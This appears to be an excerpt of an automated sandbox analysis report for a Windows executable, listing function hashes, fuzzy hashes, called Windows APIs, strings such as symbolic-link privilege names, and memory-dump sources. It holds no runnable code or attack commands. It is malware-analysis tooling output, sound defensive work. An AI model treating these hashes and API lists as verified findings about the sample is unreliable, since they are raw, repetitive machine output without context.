                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 1586f9af7d3365274489b055dedaf8a5afa0b1266f419f7e9d7413ae0caa8c0d
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6d0e471c74333b086adae3c1967863559718c63b51d846755f79312728cc8362
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 6d0e471c74333b086adae3c1967863559718c63b51d846755f79312728cc8362
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9002d525ff8d8d6d59bc5a63996ae8742328c30886889205738a6af09e855f22
                  • Instruction ID: c9c2b633d98e859f6b536f34366c0ac13638edfeb5b6d1c358f4acf02fc228f5
                  • Opcode Fuzzy Hash: 9002d525ff8d8d6d59bc5a63996ae8742328c30886889205738a6af09e855f22
                  • Instruction Fuzzy Hash: AAA0029616D1067C711C71516D16D3A265CC4C5B61330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DAB2
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a17eeb092f7df4aa29ccf51f27160a44721cde10760ce237562e69c086b65b0e
                  • Instruction ID: 52b6b7259cc4efdc3dfa7c7f0bc4b046b53fbb430fb30b0ef58f89e3480744b8
                  • Opcode Fuzzy Hash: a17eeb092f7df4aa29ccf51f27160a44721cde10760ce237562e69c086b65b0e
                  • Instruction Fuzzy Hash: 95A0029626D5057C715C7151AD16D3A265CD4D1B21330451AB806D45465548584A7431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 56185f83d3f1dac3bdb3c6dc365720bbb043fea7c1b9b73bbe4b85f15c5df102
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 56185f83d3f1dac3bdb3c6dc365720bbb043fea7c1b9b73bbe4b85f15c5df102
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 309b4c0e46bd128399d1a8b5bc17e3482b512b90bfb9ef6ade9514b612878c12
                  • Instruction ID: 8ead20a2cd32e7b51887ca609bf8f5ba78cd060561d6f69c83bdc19ef99c57cf
                  • Opcode Fuzzy Hash: 309b4c0e46bd128399d1a8b5bc17e3482b512b90bfb9ef6ade9514b612878c12
                  • Instruction Fuzzy Hash: B0A0029656D106BC311C61516D66D76371CC4D5B61330491AB906D455165855C497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DC36
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: a0543036df0653a0017f463252311d8054b37568b7b74574109774776f2f4f43
                  • Instruction ID: 8ead20a2cd32e7b51887ca609bf8f5ba78cd060561d6f69c83bdc19ef99c57cf
                  • Opcode Fuzzy Hash: a0543036df0653a0017f463252311d8054b37568b7b74574109774776f2f4f43
                  • Instruction Fuzzy Hash: B0A0029656D106BC311C61516D66D76371CC4D5B61330491AB906D455165855C497431
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8071cf501869f66844aeadf947f30cd168e1d4dfea5a1920e45fae0d7c889428
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 8071cf501869f66844aeadf947f30cd168e1d4dfea5a1920e45fae0d7c889428
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 5d738aa68587fc1481cb6e7c1de3a9ae19e54b49c6a922f1fa93b87ac4c45e78
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 5d738aa68587fc1481cb6e7c1de3a9ae19e54b49c6a922f1fa93b87ac4c45e78
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 00F4DBD5
                    • Part of subcall function 00F4DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F4DFD6
                    • Part of subcall function 00F4DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F4DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 77d5cb900b9f4e233a801bce9e7db9e4c0ab13cd4035236952c246bb6097af74
                  • Instruction ID: 6dab4783d43df9d448252100b4f94f7f37f7f2cef79eda88ced38c1e1dff75bf
                  • Opcode Fuzzy Hash: 77d5cb900b9f4e233a801bce9e7db9e4c0ab13cd4035236952c246bb6097af74
                  • Instruction Fuzzy Hash: CEA011AA2AC00BBC300822002C2BE3A2A2CC0C0FA0330880EB80AC0082AA808C883032
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,00F4A587,C:\Users\user\Desktop,00000000,00F7946A,00000006), ref: 00F4A326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: 6f15725c7f0e0d590a3741bb55a943f07f007899923e05c922cfa9e786afaa0d
                  • Instruction ID: 2f1cd25fb34b5b63dfafa7e84d4b2fcee0f1a8d6370c9e37185dedd9a9381fe4
                  • Opcode Fuzzy Hash: 6f15725c7f0e0d590a3741bb55a943f07f007899923e05c922cfa9e786afaa0d
                  • Instruction Fuzzy Hash: 7EA0123019400A578A000B30CC09C1576505761702F008620B002C00A0CB308814B500
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00F4B971
                  • EndDialog.USER32(?,00000006), ref: 00F4B984
                  • GetDlgItem.USER32(?,0000006C), ref: 00F4B9A0
                  • SetFocus.USER32(00000000), ref: 00F4B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 00F4B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00F4BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 00F4BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F4BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F4BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F4BA94
                  • _swprintf.LIBCMT ref: 00F4BAC4
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00F4BAD7
                  • FindClose.KERNEL32(00000000), ref: 00F4BADE
                  • _swprintf.LIBCMT ref: 00F4BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 00F4BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00F4BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00F4BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F4BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00F4BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00F4BBC9
                  • _swprintf.LIBCMT ref: 00F4BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00F4BC08
                  • _swprintf.LIBCMT ref: 00F4BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 00F4BC6F
                    • Part of subcall function 00F4A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00F4A662
                    • Part of subcall function 00F4A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,00F6E600,?,?), ref: 00F4A6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 62fab993abff7d983cd6b072d61b051a47796c3d3fdbf11b56179fbec6975549
                  • Instruction ID: 00026eaf6bcec999e66acec7a3376c5f6d886282e8071c8756badf9650f4d737
                  • Opcode Fuzzy Hash: 62fab993abff7d983cd6b072d61b051a47796c3d3fdbf11b56179fbec6975549
                  • Instruction Fuzzy Hash: 8A919772648348BBD721DBA0DC89FFB7BACEB4A710F040819F749D2191DB75E604A762
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F37191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00F372F1
                  • CloseHandle.KERNEL32(00000000), ref: 00F37301
                    • Part of subcall function 00F37BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00F37C04
                    • Part of subcall function 00F37BF5: GetLastError.KERNEL32 ref: 00F37C4A
                    • Part of subcall function 00F37BF5: CloseHandle.KERNEL32(?), ref: 00F37C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00F3730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00F37446
                  • CloseHandle.KERNEL32(?), ref: 00F37457
                  • GetLastError.KERNEL32 ref: 00F37467
                  • RemoveDirectoryW.KERNEL32(?), ref: 00F374B3
                  • DeleteFileW.KERNEL32(?), ref: 00F374DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: 19ef4505131ee431f0ed1a6f676f3cfbb4954cbcd8e904ca7724a2ef61322ef7
                  • Instruction ID: 9e01c53faf2005597534b6ea1198e0390d62c7563dbfa0b332cb43a216486e69
                  • Opcode Fuzzy Hash: 19ef4505131ee431f0ed1a6f676f3cfbb4954cbcd8e904ca7724a2ef61322ef7
                  • Instruction Fuzzy Hash: 60B1E3B1D04319EADF20EF64DC41BEE7B78AF04324F044169F949E7142DB78AA49EB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: 1c5643018d37112e7d91b0104b51129c14cea8c917f159d713fcdf35fae6566a
                  • Instruction ID: 63daffce550f443afc6d9eacb52ad6ad5e811bda7fab9a29d2939c7bb7559d37
                  • Opcode Fuzzy Hash: 1c5643018d37112e7d91b0104b51129c14cea8c917f159d713fcdf35fae6566a
                  • Instruction Fuzzy Hash: 3132A5719146849FDF14DF34CC86AEA37A5AF15320F04457EFD8ACB282DB78A948DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 528bf46a4451b3105f2f4b9a691d238e73bf9063d1cef72e0e6e866d61e309f7
                  • Instruction ID: f74930e7730bbad1c356ee68bc918b75abea16ed0365c9fa95dd43ee8c6abfcb
                  • Opcode Fuzzy Hash: 528bf46a4451b3105f2f4b9a691d238e73bf9063d1cef72e0e6e866d61e309f7
                  • Instruction Fuzzy Hash: 63C25C72E096288FDB38CE28DD407E9B7B5EB44316F1541EAD90DE7240E774AE899F40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __EH_prolog.LIBCMT ref: 00F327F1
                  • _strlen.LIBCMT ref: 00F32D7F
                    • Part of subcall function 00F4137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F3B652,00000000,?,?,?,00010428), ref: 00F41396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F32EE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
